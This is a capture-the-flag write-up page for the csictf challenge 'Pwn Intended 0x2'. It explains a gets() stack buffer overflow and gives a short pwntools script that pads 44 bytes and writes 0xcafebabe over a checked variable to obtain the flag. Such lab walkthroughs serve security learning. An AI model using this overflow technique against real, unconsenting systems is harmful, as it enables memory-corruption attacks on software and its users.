Writeups
  • crypt0nite
  • CTFs
    • darkctf
      • Web
        • Simple SQL
      • Rev
        • helloworld
      • pwn
        • roprop
        • newPAX
      • OSINT
        • Find Cell
        • Dark Social Web
      • Linux
        • Linux Starter
        • Find Me
      • forensics
        • Wolfie's Contact
        • Free Games
        • AW
      • crypto
        • haXXor
        • Pipe Rhyme
    • csictf
      • Crypto
        • Mein Kampf
        • Rivest-Shamir-Adleman
      • Linux
        • AKA
      • Miscellaneous
        • No DIStractions
      • OSINT
        • Pirates of the Memorial
        • Commitment
        • Flying Places
        • Shaken
      • Pwn
        • Pwn Intended 0x1
        • Pwn Intended 0x2
        • Pwn Intended 0x3
        • Global Warming
        • Smash
        • Secret Society
      • Reversing
        • Blaise
        • RicknMorty
      • Web
        • Oreo
        • Mr. Rami
        • The Confused Deputy
    • NahamCon
      • Crypto
        • Unvreakable Vase
        • Ooo-La-La
        • HomeCooked
        • DocXor
      • Forensics
        • Volatile
        • Microsooft
        • Cow Pie
      • Miscellaneous
        • Fake File
        • Alkatraz
      • Mobile
        • CAndroid
        • Simple App
      • OSINT
        • New Year's Solutions
        • Tron
      • Pwn
        • Dangerous
      • Scripting
        • Rotten
        • Really Powerful Gnomes
      • Steganography
        • KSteg
      • Web
        • PHPhone Book
        • Official Business
        • Localghost
        • Agent 95
    • BSides Delhi
      • Thanks for Attending
      • Cookie Robot
    • hacktoberctf
      • Traffic Analysis
        • Evil Corp's Child 1, 2 and 3
        • Remotely Administered Evil 1 and 2
        • An Evil Christmas Carol 1 and 2
      • Forensics
        • Captured Memories
        • Amcaching In
      • Linux
        • Talking To The Dead
Powered by GitBook
On this page
  • Analysis
  • Exploitation

Was this helpful?

Export as PDF
  1. CTFs
  2. csictf
  3. Pwn

Pwn Intended 0x2

Travelling through spacetime!

PreviousPwn Intended 0x1NextPwn Intended 0x3

Last updated 4 years ago

Was this helpful?

Analysis

Sadly, we can't just smash the keyboard. Let's check what protections are enabled.

NX is enabled, so unfortunately no shellcode, but no other protections. Let's perhaps decompile it in GHidra.

So we have a 44-byte-long buffer storing our input, which is read by gets() - a clear buffer overflow vulnerability. Interestingly, the program seems to also return the flag if the if condition is met. I've known GHidra to make mistakes with numbers, so I check the disassembly in radare2.

Exploitation

As we can see, the buffer our input is stored in is lower down the stack to the variable that is compared, so if we overflow the buffer we will overflow into the other variable. From the decompilation we know the buffer is 44 bytes long, so we need 44 bytes of padding before we reach the checked variable and write 0xcafebabe.

from pwn import *

p = remote('chall.csivit.com', 30007)

payload = b'A' * 44
payload += p32(0xcafebabe)

p.sendline(payload)

print(p.clean().decode())

Flag: csictf{c4n_y0u_re4lly_telep0rt?}